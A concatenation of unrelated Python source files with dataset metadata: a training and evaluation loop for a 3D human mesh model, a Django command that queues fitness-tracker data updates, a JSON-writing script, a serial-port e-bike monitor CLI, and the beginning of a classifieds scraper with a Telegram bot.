                duration=get_HHMMSS_from_second(seconds=(time.time()-batch_start))
            )
            print(train_template_filled)
            self.train_templates.append(train_template_filled)
            if (batch_idx+1) == len_train_dataloader:
                self.train_templates.append("======================================================================")
            batch_start = time.time()
    ### save train info when one epoch is completed ###
    save_templates_info(self.train_templates, self.output_dir, "train_templates.txt")
    print("Train Time: {train_time}, Total Time: {total_time}".format(
        train_time=get_HHMMSS_from_second(seconds=(time.time()-self.epoch_start)),
        total_time=get_HHMMSS_from_second(seconds=(time.time()-self.total_start))))
### Evaluate ###
def evaluate(self, test_dataloader, test_dataset_name, is_save_pth=True):
    """Evaluate the current HMR model on one test set.

    ``test_dataset_name`` selects the protocol:
      * "h36m" / "3dpw": 3D pose metrics — MPJPE and PA-MPJPE in mm on
        pelvis-centred joints; for "3dpw" the ground truth comes from
        gendered SMPL meshes regressed to H36M joints.
      * "lsp": foreground/background and body-part segmentation
        accuracy / F1 against UP-3D annotations.

    Side effects: dumps debug images/meshes for the first batch,
    appends a formatted summary to the per-dataset template list, and
    (when ``is_save_pth``) saves checkpoints, keeping a "best" copy
    when the tracked metric improves.
    """
    joint_mapper_h36m = constants.H36M_TO_J17 if self.args.test_dataset == 'mpi-inf-3dhp' else constants.H36M_TO_J14
    joint_mapper_gt = constants.J24_TO_J17 if self.args.test_dataset == 'mpi-inf-3dhp' else constants.J24_TO_J14
    test_start = time.time()
    self.HMR.eval()
    # Per-batch progress templates are only used in evaluation-only runs.
    if self.args.train == 0:
        if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
            test_template_batch = \
                '===================Test===================\n' \
                'Batch: {}/{} | ' \
                'Mpjpe: {mpjpe_average_meter.avg:.2f} ' \
                'Rec_error: {pa_mpjpe_average_meter.avg:.2f} ' \
                '\n=========================================='
        elif test_dataset_name == "lsp":
            test_template_batch = \
                '===================Test===================\n' \
                'Batch: {}/{} | ' \
                'Part acc: {part_Acc_average_meter:.2f} ' \
                'Part F1: {part_F1_average_meter:.2f} ' \
                'FG-BG Acc: {Acc_average_meter:.2f} ' \
                'FG-BG F1: {F1_average_meter:.2f} ' \
                '\n=========================================='
    if test_dataset_name == "h36m":
        test_template = \
            '===================Test===================\n' \
            'Test Data: {} | ' \
            'Epoch: {}/{} | ' \
            'Mpjpe: {mpjpe_average_meter.avg:.2f} | ' \
            'Rec_error: {pa_mpjpe_average_meter.avg:.2f} | ' \
            'loss: {losses.avg:.5f} | ' \
            'Test Time: {test_time} | Epoch Time: {epoch_time} | ' \
            'Total Time: {total_time}' \
            '\n=========================================='
    elif test_dataset_name == "3dpw":
        test_template = \
            '===================Test===================\n' \
            'Test Data: {} | ' \
            'Epoch: {}/{} | ' \
            'Mpjpe: {mpjpe_average_meter.avg:.2f} | ' \
            'Rec_error: {pa_mpjpe_average_meter.avg:.2f} | ' \
            'Test Time: {test_time} | Epoch Time: {epoch_time} | ' \
            'Total Time: {total_time}' \
            '\n=========================================='
    elif test_dataset_name == "lsp":
        test_template = \
            '===================Test===================\n' \
            'Test Data: {} | ' \
            'Epoch: {}/{} | ' \
            'Part acc: {part_Acc_average_meter:.2f} | ' \
            'Part F1: {part_F1_average_meter:.2f} | ' \
            'FG-BG Acc: {Acc_average_meter:.2f} | ' \
            'FG-BG F1: {F1_average_meter:.2f} | ' \
            'Test Time: {test_time} | Epoch Time: {epoch_time} | ' \
            'Total Time: {total_time}' \
            '\n=========================================='
    self.mpjpe_average_meter = AverageMeter()
    self.pa_mpjpe_average_meter = AverageMeter()
    self.losses = AverageMeter()
    self.part_Acc_average_meter = 0
    self.part_F1_average_meter = 0
    self.Acc_average_meter = 0
    self.F1_average_meter = 0
    # Best-so-far metric used for "best" checkpointing (training runs only).
    if self.args.train != 0:
        if test_dataset_name == "h36m":
            current_mpjpe = self.current_mpjpe_h36m
        elif test_dataset_name == "3dpw":
            current_mpjpe = self.current_mpjpe_3dpw
        elif test_dataset_name == "lsp":
            current_acc = self.current_acc_lsp
    batch_num = len(test_dataloader)
    # Running counters for the LSP segmentation metrics.
    accuracy = 0.
    parts_accuracy = 0.
    pixel_count = 0
    parts_pixel_count = 0
    tp = np.zeros((2,1))
    fp = np.zeros((2,1))
    fn = np.zeros((2,1))
    parts_tp = np.zeros((7,1))
    parts_fp = np.zeros((7,1))
    parts_fn = np.zeros((7,1))
    with torch.no_grad():
        for batch_idx, item in tqdm.tqdm(enumerate(test_dataloader), desc='{} Eval'.format(test_dataset_name), total=len(test_dataloader)):
            # Validation for early stopping
            if test_dataset_name == "h36m":
                img = item["img"]
                img = img.to(self.device)
                batch_size = img.shape[0]
                output = self.HMR(img, J_regressor=self.J_regressor)
                output = output[-1]
                pred_j3ds = output['kp_3d']
                # Centre predictions on the hip midpoint (pelvis).
                pred_pelvis = (pred_j3ds[:,[2],:] + pred_j3ds[:,[3],:]) / 2.0
                pred_j3ds -= pred_pelvis
                target_j3ds = item["pose_3d"]
                target_j3ds = target_j3ds[:, joint_mapper_gt, :-1]
                target_j3ds = target_j3ds.float().to(self.device)
                target_pelvis = (target_j3ds[:,[2],:] + target_j3ds[:,[3],:]) / 2.0
                target_j3ds -= target_pelvis
                loss = self.loss_fn_MSE(pred_j3ds, target_j3ds)
                self.losses.update(loss.item(), batch_size)
            if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
                img = item["img"]
                img = img.to(self.device)
                batch_size = img.shape[0]
                output = self.HMR(img, J_regressor=self.J_regressor)
                output = output[-1]
                pred_j3ds = output['kp_3d']
                pred_pelvis = (pred_j3ds[:,[2],:] + pred_j3ds[:,[3],:]) / 2.0
                pred_j3ds -= pred_pelvis
                pred_vertices = output["verts"]
                faces = get_smpl_faces().astype(np.int32)
                faces = torch.from_numpy(faces).to(self.device)
                faces = faces.expand((batch_size, -1, -1))
                J_regressor_batch = self.J_regressor_torch[None, :].expand(pred_vertices.shape[0], -1, -1).to(self.device)
                if test_dataset_name == 'h36m':
                    target_j3ds = item["pose_3d"]
                    target_j3ds = target_j3ds[:, joint_mapper_gt, :-1]
                else:
                    # 3DPW GT: regress H36M joints from gendered SMPL meshes.
                    gt_pose = item["pose"].to(self.device)
                    gt_betas = item["betas"].to(self.device)
                    gender = item["gender"].to(self.device)
                    gt_vertices = self.smpl_male(global_orient=gt_pose[:,:3], body_pose=gt_pose[:,3:], betas=gt_betas).vertices
                    gt_vertices_female = self.smpl_female(global_orient=gt_pose[:,:3], body_pose=gt_pose[:,3:], betas=gt_betas).vertices
                    gt_vertices[gender==1, :, :] = gt_vertices_female[gender==1, :, :]
                    target_j3ds = torch.matmul(J_regressor_batch, gt_vertices)
                    gt_pelvis = target_j3ds[:, [0],:].clone()
                    target_j3ds = target_j3ds[:, joint_mapper_h36m, :]
                    target_j3ds = target_j3ds - gt_pelvis
                target_j3ds = target_j3ds.float().to(self.device)
                target_pelvis = (target_j3ds[:,[2],:] + target_j3ds[:,[3],:]) / 2.0
                target_j3ds -= target_pelvis
                # MPJPE and Procrustes-aligned MPJPE, converted to mm.
                errors = torch.sqrt(((pred_j3ds - target_j3ds) ** 2).sum(dim=-1)).mean(dim=-1).cpu().numpy()
                S1_hat = batch_compute_similarity_transform_torch(pred_j3ds, target_j3ds)
                errors_pa = torch.sqrt(((S1_hat - target_j3ds) ** 2).sum(dim=-1)).mean(dim=-1).cpu().numpy()
                m2mm = 1000
                mpjpe = np.mean(errors) * m2mm
                pa_mpjpe = np.mean(errors_pa) * m2mm
                self.mpjpe_average_meter.update(mpjpe, batch_size)
                self.pa_mpjpe_average_meter.update(pa_mpjpe, batch_size)
            elif test_dataset_name == "lsp":
                annot_path = config.DATASET_FOLDERS['upi-s1h']
                img = item["img"]
                img = img.to(self.device)
                batch_size = img.shape[0]
                orig_shape = item["orig_shape"].cpu().numpy()
                scale = item["scale"].cpu().numpy()
                center = item["center"].cpu().numpy()
                output = self.HMR(img, J_regressor=self.J_regressor)
                output = output[-1]
                pred_vertices = output["verts"]
                cam = output['theta'][:, :3]
                faces = get_smpl_faces().astype(np.int32)
                faces = torch.from_numpy(faces).to(self.device)
                faces = faces.expand((batch_size, -1, -1))
                mask, parts = self.seg_renderer(pred_vertices, cam)
                save_gt_parts = []
                save_gt_seg = []
                for i in range(batch_size):
                    # After rendering, convert image back to original resolution
                    pred_mask = uncrop(mask[i].cpu().numpy(), center[i], scale[i], orig_shape[i]) > 0
                    # Load gt mask
                    gt_mask = cv2.imread(os.path.join(annot_path, item['maskname'][i]), 0) > 0
                    if batch_idx == 0:
                        save_gt_seg.append(gt_mask)
                    # Evaluation consistent with the original UP-3D code
                    accuracy += (gt_mask == pred_mask).sum()
                    pixel_count += np.prod(np.array(gt_mask.shape))
                    for c in range(2):
                        cgt = gt_mask == c
                        cpred = pred_mask == c
                        tp[c] += (cgt & cpred).sum()
                        fp[c] += (~cgt & cpred).sum()
                        fn[c] += (cgt & ~cpred).sum()
                    f1 = 2 * tp / (2 * tp + fp + fn)
                for i in range(batch_size):
                    pred_parts = uncrop(parts[i].cpu().numpy().astype(np.uint8), center[i], scale[i], orig_shape[i])
                    # Load gt part segmentation
                    gt_parts = cv2.imread(os.path.join(annot_path, item['partname'][i]), 0)
                    if batch_idx == 0:
                        save_gt_parts.append(gt_parts)
                    # Evaluation consistent with the original UP-3D code
                    # 6 parts + background
                    for c in range(7):
                        cgt = gt_parts == c
                        cpred = pred_parts == c
                        cpred[gt_parts == 255] = 0  # ignore "don't care" pixels
                        parts_tp[c] += (cgt & cpred).sum()
                        parts_fp[c] += (~cgt & cpred).sum()
                        parts_fn[c] += (cgt & ~cpred).sum()
                    gt_parts[gt_parts == 255] = 0
                    pred_parts[pred_parts == 255] = 0
                    parts_f1 = 2 * parts_tp / (2 * parts_tp + parts_fp + parts_fn)
                    parts_accuracy += (gt_parts == pred_parts).sum()
                    parts_pixel_count += np.prod(np.array(gt_parts.shape))
                self.part_Acc_average_meter = (parts_accuracy / parts_pixel_count) * 100
                self.part_F1_average_meter = parts_f1[[0,1,2,3,4,5,6]].mean()
                self.Acc_average_meter = (accuracy / pixel_count) * 100
                self.F1_average_meter = f1.mean()
            # Dump debug images/meshes for the first batch only.
            if batch_idx == 0:
                for i in range(10 if batch_size > 10 else batch_size):
                    img_dict = dict()
                    img_dict["orig_img.jpg"] = img[i]
                    if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
                        save_joints3d_img(
                            target_j3ds[i],
                            pred_j3ds[i],
                            self.output_dir,
                            self.epoch+1,
                            test_dataset=test_dataset_name,
                            test_idx=i
                        )
                        save_mesh(
                            pred_vertices[i],
                            faces[i],
                            self.output_dir,
                            self.epoch+1,
                            test_dataset=test_dataset_name,
                            test_idx=i
                        )
                    elif test_dataset_name == "lsp":
                        img_dict["mask.jpg"] = mask[i].cpu().numpy()
                        img_dict["parts.jpg"] = parts[i].cpu().numpy()
                        img_dict["gt_parts.jpg"] = save_gt_parts[i]
                        img_dict["gt_seg.jpg"] = save_gt_seg[i]
                    save_all_img(img_dict, self.output_dir, self.epoch+1, test_dataset=test_dataset_name, test_idx=i)
            # Per-batch progress printing in evaluation-only runs.
            if self.args.train == 0 and (batch_idx+1) % self.args.freq_print_test == 0:
                if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
                    test_template_batch_filled = test_template_batch.format(
                        batch_idx+1,
                        batch_num,
                        mpjpe_average_meter=self.mpjpe_average_meter,
                        pa_mpjpe_average_meter=self.pa_mpjpe_average_meter,
                    )
                elif test_dataset_name == "lsp":
                    test_template_batch_filled = test_template_batch.format(
                        batch_idx+1,
                        batch_num,
                        part_Acc_average_meter=self.part_Acc_average_meter,
                        part_F1_average_meter=self.part_F1_average_meter,
                        Acc_average_meter=self.Acc_average_meter,
                        F1_average_meter=self.F1_average_meter,
                    )
                print(test_template_batch_filled)
    if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
        # NOTE(review): this branch also handles "3dpw" (extra `losses`
        # kwarg is ignored by str.format), which makes the elif below dead.
        test_template_filled = test_template.format(
            test_dataset_name,
            self.epoch+1,
            self.num_epoch,
            mpjpe_average_meter=self.mpjpe_average_meter,
            pa_mpjpe_average_meter=self.pa_mpjpe_average_meter,
            losses=self.losses,
            test_time=get_HHMMSS_from_second(seconds=(time.time()-test_start)),
            epoch_time=get_HHMMSS_from_second(seconds=(time.time()-self.epoch_start)),
            total_time=get_HHMMSS_from_second(seconds=(time.time()-self.total_start))
        )
    elif test_dataset_name == "3dpw":
        # NOTE(review): unreachable — "3dpw" is already matched above.
        test_template_filled = test_template.format(
            test_dataset_name,
            self.epoch+1,
            self.num_epoch,
            mpjpe_average_meter=self.mpjpe_average_meter,
            pa_mpjpe_average_meter=self.pa_mpjpe_average_meter,
            test_time=get_HHMMSS_from_second(seconds=(time.time()-test_start)),
            epoch_time=get_HHMMSS_from_second(seconds=(time.time()-self.epoch_start)),
            total_time=get_HHMMSS_from_second(seconds=(time.time()-self.total_start))
        )
    elif test_dataset_name == "lsp":
        test_template_filled = test_template.format(
            test_dataset_name,
            self.epoch+1,
            self.num_epoch,
            part_Acc_average_meter=self.part_Acc_average_meter,
            part_F1_average_meter=self.part_F1_average_meter,
            Acc_average_meter=self.Acc_average_meter,
            F1_average_meter=self.F1_average_meter,
            test_time=get_HHMMSS_from_second(seconds=(time.time()-test_start)),
            epoch_time=get_HHMMSS_from_second(seconds=(time.time()-self.epoch_start)),
            total_time=get_HHMMSS_from_second(seconds=(time.time()-self.total_start))
        )
    print(test_template_filled)
    # save test templates info txt file
    if self.args.train != 0:
        if test_dataset_name == "h36m":
            self.test_templates_h36m.append(test_template_filled)
            templates_filename = "test_templates_h36m.txt"
            save_templates_info(self.test_templates_h36m, self.output_dir, templates_filename)
        elif test_dataset_name == "3dpw":
            self.test_templates_3dpw.append(test_template_filled)
            templates_filename = "test_templates_3dpw.txt"
            save_templates_info(self.test_templates_3dpw, self.output_dir, templates_filename)
        elif test_dataset_name == "lsp":
            self.test_templates_lsp.append(test_template_filled)
            templates_filename = "test_templates_lsp.txt"
            save_templates_info(self.test_templates_lsp, self.output_dir, templates_filename)
    else:
        self.test_templates.append(test_template_filled)
        templates_filename = "test_templates.txt"
        save_templates_info(self.test_templates, self.output_dir, templates_filename)
    # save pth file
    if is_save_pth:
        if self.epoch >= self.args.first_stage_nEpoch:
            if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
                # Save best pth
                if self.mpjpe_average_meter.avg < current_mpjpe:
                    print("MPJPE changes from {:.4f} to {:.4f}".format(current_mpjpe, self.mpjpe_average_meter.avg))
                    self.save_checkpoint_all(test_dataset_name, best=True)
                else:
                    print("MPJPE doesn't change {:.4f}".format(current_mpjpe))
            elif test_dataset_name == "lsp":
                # Save best pth
                if self.Acc_average_meter > current_acc:
                    print("ACC changes from {:.4f} to {:.4f}".format(current_acc, self.Acc_average_meter))
                    self.save_checkpoint_all(test_dataset_name, best=True)
                else:
                    print("ACC doesn't change {:.4f}".format(current_acc))
        # Save latest pth
        if self.args.save_pth_all_epoch:
            self.save_checkpoint_all(test_dataset_name, save_all_epoch=True)
        else:
            self.save_checkpoint_all(test_dataset_name)
    def save_checkpoint_all(self, test_dataset_name, best=False, save_all_epoch=False):
        """
        save pth file
        Args:
            test_dataset_name (str): dataset tag ("h36m", "3dpw" or "lsp");
                baked into the filename for best / per-epoch checkpoints.
            best (bool): save under "best_<net>_<dataset>.pth" and record the
                metric that earned it.
            save_all_epoch (bool): save under "<net>_<dataset>_epoch<N>.pth"
                so every epoch is kept (ignored when best is True).
        """
        # "{}.pth" has a single placeholder; str.format silently ignores the
        # extra test_dataset_name argument, so the "latest" checkpoint name
        # is dataset-agnostic.
        filename = "best_{}_{}.pth" if best else "{}.pth"
        if save_all_epoch and not best:
            filename = "{}_{}_epoch"+str(self.epoch+1)+".pth"
        ### 3task network save pth, texture net save pth ###
        # First (self-supervised) stage: persist the pretext-task networks,
        # their optimizers and current losses/accuracies.
        if self.epoch < self.args.first_stage_nEpoch:
            save_checkpoint({
                "state_dict": self.context_encoder_net.state_dict(),
                "loss": self.losses_CE.avg,
                "optimizer": self.context_encoder_optimizer.state_dict()
                },
                self.output_dir,
                filename.format("context_encoder_net", test_dataset_name))
            save_checkpoint({
                "state_dict": self.discriminator.state_dict(),
                "loss": self.losses_DC.avg,
                "optimizer": self.discriminator_optimizer.state_dict()
                },
                self.output_dir,
                filename.format("discriminator", test_dataset_name))
            save_checkpoint({
                "state_dict": self.jigsaw_puzzle_net.state_dict(),
                "accuracy": self.acces_JP.avg,
                "optimizer": self.jigsaw_puzzle_optimizer.state_dict()
                },
                self.output_dir,
                filename.format("jigsaw_puzzle_net", test_dataset_name))
            save_checkpoint({
                "state_dict": self.rotation_net.state_dict(),
                "accuracy": self.acces_ROT.avg,
                "optimizer": self.rotation_optimizer.state_dict()
                },
                self.output_dir,
                filename.format("rotation_net", test_dataset_name))
            save_checkpoint({
                "state_dict": self.texture_net.state_dict(),
                "loss": self.losses_texture_ori_img.avg,
                "optimizer": self.texture_net_optimizer.state_dict(),
                },
                self.output_dir,
                filename.format("texture_net", test_dataset_name))
        ### hmr save pth ###
        # Second stage: persist the HMR network and texture discriminator.
        else:
            save_checkpoint({
                "state_dict": self.HMR.state_dict(),
                "loss_joints3d": self.losses_HMR_joints3d.avg,
                "loss_3task": self.losses_HMR_3task.avg,
                "optimizer_joints": self.HMR_optimizer_all.state_dict(),
                },
                self.output_dir,
                filename.format("hmr", test_dataset_name))
            save_checkpoint({
                "state_dict": self.texture_discriminator.state_dict(),
                "loss": self.losses_disc.avg,
                "optimizer": self.texture_discriminator_optimizer.state_dict()
                },
                self.output_dir,
                filename.format("texture_discriminator", test_dataset_name))
        # Record the metric that earned this "best" checkpoint so future
        # evaluations compare against it.
        # NOTE(review): for "lsp" the raw meter object is stored (no .avg),
        # matching how evaluate() compares it — confirm this is intended.
        if best:
            if test_dataset_name == "h36m":
                self.current_mpjpe_h36m = self.mpjpe_average_meter.avg
            elif test_dataset_name == "3dpw":
                self.current_mpjpe_3dpw = self.mpjpe_average_meter.avg
            elif test_dataset_name == "lsp":
                self.current_acc_lsp = self.Acc_average_meter
    def fit(self):
        """Run the full training schedule, or a single evaluation pass.

        With args.train != 0: trains for num_epoch epochs, evaluating every
        freq_eval epochs (and on the last epoch).  Once the first
        (self-supervised) stage ends, the texture discriminator is
        warm-started from the stage-one discriminator checkpoint.
        With args.train == 0: sets up minimal state for one evaluation.
        """
        if self.args.train != 0:
            # Best-so-far metrics; updated by save_checkpoint_all().
            self.current_mpjpe_h36m = math.inf
            self.current_mpjpe_3dpw = math.inf
            self.current_acc_lsp = 0
            self.train_loss = math.inf
            self.total_start = time.time()
            self.train_templates = list()
            self.test_templates_h36m = list()
            self.test_templates_3dpw = list()
            self.test_templates_lsp = list()
            for epoch in range(self.num_epoch):
                self.epoch = epoch
                self.epoch_start = time.time()
                # Optional evaluation before any training; epoch is
                # temporarily set to -1 so it is logged as pre-training.
                if epoch == 0 and self.args.first_eval:
                    self.epoch = -1
                    self.evaluate(self.test_dataloader_h36m, test_dataset_name="h36m", is_save_pth=False)
                    # self.evaluate(self.test_dataloader_3dpw, test_dataset_name="3dpw", is_save_pth=False)
                    # self.evaluate(self.test_dataloader_lsp, test_dataset_name="lsp", is_save_pth=False)
                    self.epoch = epoch
                print("HMR_optimizer_joints lr:", self.HMR_scheduler_all.get_lr())
                # Entering the second stage: warm-start the texture
                # discriminator from the stage-one discriminator weights.
                if self.epoch == self.args.first_stage_nEpoch:
                    texture_discriminator_checkpoint = torch.load(os.path.join("results", self.args.output_dir, "save_pth", "discriminator.pth"), map_location=self.device)
                    self.texture_discriminator.load_state_dict(texture_discriminator_checkpoint["state_dict"])
                self.train()
                # The HMR scheduler only steps during the second stage.
                if self.epoch >= self.args.first_stage_nEpoch:
                    self.HMR_scheduler_all.step()
                if (epoch+1)%self.args.freq_eval == 0 or (epoch+1) == self.num_epoch:
                    self.evaluate(self.test_dataloader_h36m, test_dataset_name="h36m")
                    # self.evaluate(self.test_dataloader_3dpw, test_dataset_name="3dpw")
                    # self.evaluate(self.test_dataloader_lsp, test_dataset_name="lsp")
        else:
            # Evaluation-only mode: minimal bookkeeping for a single pass.
            self.epoch = 0
            self.num_epoch = 1
            self.total_start = time.time()
            self.epoch_start = time.time()
            self.test_templates = list()
self.evaluate(self.test_dataloader, test_dataset_name=self.args.test_dataset.replace("-p2", ""), is_save_pth=False) | JunukCha/SSPSE | trainer.py | trainer.py | py | 45,916 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "datetime.datetime.now",
"line_number": 131,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 131,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.strftime",
"line_number": 132,
"usage_type": "call"
},
{
"api_na... |
22313884437 | from django.core.management.base import BaseCommand
from import_data.models import OuraMember, FitbitMember, GoogleFitMember
from retrospective.tasks import (
update_fitbit_data,
update_oura_data,
update_googlefit_data,
)
import time
import requests
class Command(BaseCommand):
    """Management command that queues data-update tasks for every member."""

    help = "Updates all data for all members"

    def handle(self, *args, **options):
        # cheat to wake up sleeping worker
        requests.get("https://oh-oura-connect.herokuapp.com/")

        # Fan the per-member updates out to the task queue, pausing briefly
        # between submissions.
        for member in OuraMember.objects.all():
            update_oura_data.delay(member.id)
            print("submitted oura update for {}".format(member.id))
            time.sleep(2)

        for member in FitbitMember.objects.all():
            update_fitbit_data.delay(member.id)
            print("submitted fitbit update for {}".format(member.id))
            time.sleep(2)

        for member in GoogleFitMember.objects.all():
            update_googlefit_data.delay(member.user.oh_id, member.user.user.id)
            print("submitted googlefit update for {}".format(member.id))
            time.sleep(2)
| OpenHumans/quantified-flu | import_data/management/commands/update_data_imports.py | update_data_imports.py | py | 1,148 | python | en | code | 24 | github-code | 36 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "import_data.models.OuraMember.objects.all",
"line_number": 19,
"usage_type": "call"
... |
11514166585 | from hashlib import sha1
from json import dump
from os import makedirs
# Catalog of published app ids, serialized verbatim into api/apps.json.
apps = {
    'apps': [
        'club.postdata.covid19cuba',
        'com.codestrange.www.cuba_weather',
        'com.cubanopensource.todo',
    ]
}


def main():
    """Write ``api/apps.json`` and a companion ``api/apps_hash.json``.

    The hash file contains the SHA-1 hexdigest of the exact bytes of
    ``api/apps.json`` so clients can cheaply detect changes.
    (Cleanup: dropped the pointless ``f''`` prefixes on constant paths and
    the premature ``result = {}`` initialization.)
    """
    makedirs('api', exist_ok=True)
    with open('api/apps.json', mode='w', encoding='utf-8') as file:
        dump(apps, file, ensure_ascii=False)
    # Re-read so the hash covers the file exactly as written to disk.
    with open('api/apps.json', encoding='utf-8') as file:
        text = file.read()
    result = {'hash': sha1(text.encode()).hexdigest()}
    with open('api/apps_hash.json', mode='w', encoding='utf-8') as file:
        dump(result, file, ensure_ascii=False)
if __name__ == '__main__':
    # Script entry point.
    main()
| leynier/cubaopenplay.github.io | app/main.py | main.py | py | 725 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "os.makedirs",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "hashlib.sha1",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 25,... |
5881104834 | import array
import binascii
import configparser
import datetime
import io
import logging
import os
import signal
import sys
import time
try:
    import serial
except ImportError:
    # Only flag the missing optional dependency when the import actually
    # fails; the startup banner checks "'ModulSerialMissing' in locals()"
    # to decide whether to warn.  (Previously the flag was set
    # unconditionally, so the warning appeared even with pyserial
    # installed.)
    ModulSerialMissing = True
################################################################################
# Constants
BUILDVERSION = "V1.0.0"    # shown in the startup banner
BUILDDATE = "2017-10-22"   # shown in the startup banner
################################################################################
# classes / structs
class mondata:
    """Mutable container for the monitor state shared across all modes.

    Most fields are stored as short strings (e.g. "000"), not numbers.
    """
    def __init__(self):
        self.viewmode=0
        # Decoded display/controller values (stringly typed).
        self.Lights="0"
        self.SC1TX="0"
        self.percAssist="000"
        self.AWD="0"
        self.C10="0"
        self.Voltage="000"
        self.Current="000"
        self.SC1RX="0"
        self.SC2="00"
        self.Speed="000"
        self.D1618="000"
        self.D1921="000"
        self.D2224="000"
        self.D2527="000"
        self.wsize="0"
        # Raw TX/RX frame buffers.
        self.TX=""
        self.RX=""
self.PLIST=["---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---"]
################################################################################
# Import external functions
import lib.message as msg
import lib.config as cfg
import lib.osys as osy
import arg as arg
# TODO:
# - TX RX Handlers
# - TX RX Parsers
# - Basic Logging
# - Basic TX Construction mode (Parameter Reading P00 P59)
# - PDCURSES?
################################################################################
# Functions
def signal_handler(sig, frame):
    """Exit cleanly on SIGINT (Ctrl+C).

    The first parameter was renamed from ``signal`` so it no longer shadows
    the ``signal`` module; the handler is invoked positionally by the
    interpreter, so callers are unaffected.
    """
    sys.exit(0)
################################################################################
# begin main
# init global vars
# Shared monitor-state container used by all modes below.
monitordata= mondata()
# NOTE(review): this sets 'viewmode' on the *class*, not on the instance
# created above — presumably 'monitordata.viewmode = 0' was intended; confirm.
mondata.viewmode=0
# Exit gracefully on Ctrl+C.
signal.signal(signal.SIGINT, signal_handler)
cfg.read(cfg)
# With no arguments: print the version banner and usage hints.
if len(sys.argv) == 1:
    print('\npye-motion ' + BUILDVERSION + ' - ' + BUILDDATE)
    # check for modules which might not be part of the standard python 3 installation
    if 'ModulSerialMissing' in locals():
        print('Missing Module pyserial. Install by typing pye-motion -install')
    print('No command line argument given. type pye-motion -help for valid arguments')
# Dispatch on the first command line argument.
# Bug fix: the original tests used `sys.argv[1] in ("-help")`, where
# ("-help") is just a parenthesized string, so the check was a *substring*
# test (e.g. "-h" or "el" matched "-help").  Exact comparison is intended.
if len(sys.argv) != 1:
    if sys.argv[1] == "-help":
        arg.help()
        exit()
    elif sys.argv[1] == "-install":
        arg.install()
        exit()
    elif sys.argv[1] == "-listen":
        msg.serialOpen(cfg)
        arg.listen(monitordata)
    elif sys.argv[1] == "-plisten":
        print("warning: This modus requires to set the LCD into settings mode first. ")
        print("Hold + and - simultaneously to enter settings. ")
        input("press enter to continue")
        msg.serialOpen(cfg)
        arg.plisten(monitordata)
    elif sys.argv[1] == "-pquery":
        print("warning: This modus requires to set the LCD into settings mode first. ")
        print("Hold + and - simultaneously to enter settings. ")
        input("press enter to continue")
        msg.serialOpen(cfg)
        arg.pquery(monitordata)
    elif sys.argv[1] == "-speedlimit":
        print("warning: This modus requires to set the LCD into settings mode first. ")
        print("Hold + and - simultaneously to enter settings. ")
        input("press enter to continue")
        msg.serialOpen(cfg)
        # Optional third argument: the speed limit value (defaults to 0).
        if len(sys.argv) == 3:
            arg.speedlimit(monitordata, sys.argv[2])
        else:
            arg.speedlimit(monitordata, 0)
        exit()
    else:
        print('Invalid command line argument given. type pye-motion - help for valid arguments')
# sample code for opening, sending, receiving and closing comport
#ser = serial.Serial(port_A, py pybaudrate=baud_A, timeout=1) # open first serial port
#print ("Port opened: " + ser.portstr) # check which port was really used
#ser.write("hello world".encode("utf-8")) # write a string
#receive = ser.read(11)
#print (receive.decode("utf-8"))
#ser.close() # close port
| nasrudin2468/pye-motion | pye-motion.py | pye-motion.py | py | 4,158 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "sys.exit",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "signal.signal",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "signal.SIGINT",
"line_number": 81,
"usage_type": "attribute"
},
{
"api_name": "lib.config.read",
"line... |
38660134742 | import logging
import sys
import click
import requests
from bs4 import BeautifulSoup
from telegram.ext import CommandHandler, Filters, MessageHandler, Updater
from tinydb import Query, TinyDB
db = TinyDB("db.json")  # persistent store of watched search jobs
Job = Query()           # reusable tinydb query object
# NOTE(review): never reassigned at module scope — run() only ever bound a
# local of the same name; this global stays None.
TELEGRAM_BOT_TOKEN = None
class JobExistsException(Exception):
    """Raised when a search term is already being watched."""
    pass
def parse_result_item(item):
    """
    Takes a li item containing one search result and parses id, url and price from it.
    Returns a dict containing the results.
    """
    divs = item.find_all("div", {"aditem-main"})
    prices = item.find_all("p", {"aditem-main--middle--price"})
    articles = item.find_all("article")
    # Exactly one of each element is expected per result row.
    if not (len(divs) == len(articles) == len(prices) == 1):
        return None
    result = {
        "ad_id": articles[0]["data-adid"],
        "price": prices[0].text.strip(),
    }
    anchor = divs[0].find_all("a")[0]
    result["url"] = "https://www.ebay-kleinanzeigen.de" + anchor["href"]
    return result
def execute_search(search_term):
    """
    Runs the search for one search term.
    Returns a list containing all parsed search results.

    NOTE(review): the URL path segments (s-79249 / k0l9364r20) appear to be
    hard-coded location/category/radius parameters — confirm before reuse.
    """
    # Browser-like User-Agent, presumably to avoid bot blocking.
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
    }
    url = f"https://www.ebay-kleinanzeigen.de/s-79249/{search_term}/k0l9364r20"
    response = requests.get(url, headers=headers)
    soup = BeautifulSoup(response.content, features="html.parser")
    ul = soup.find_all("ul", {"id": "srchrslt-adtable"})
    # Exactly one result table is expected; note this assert is stripped
    # under `python -O`.
    assert len(ul) == 1
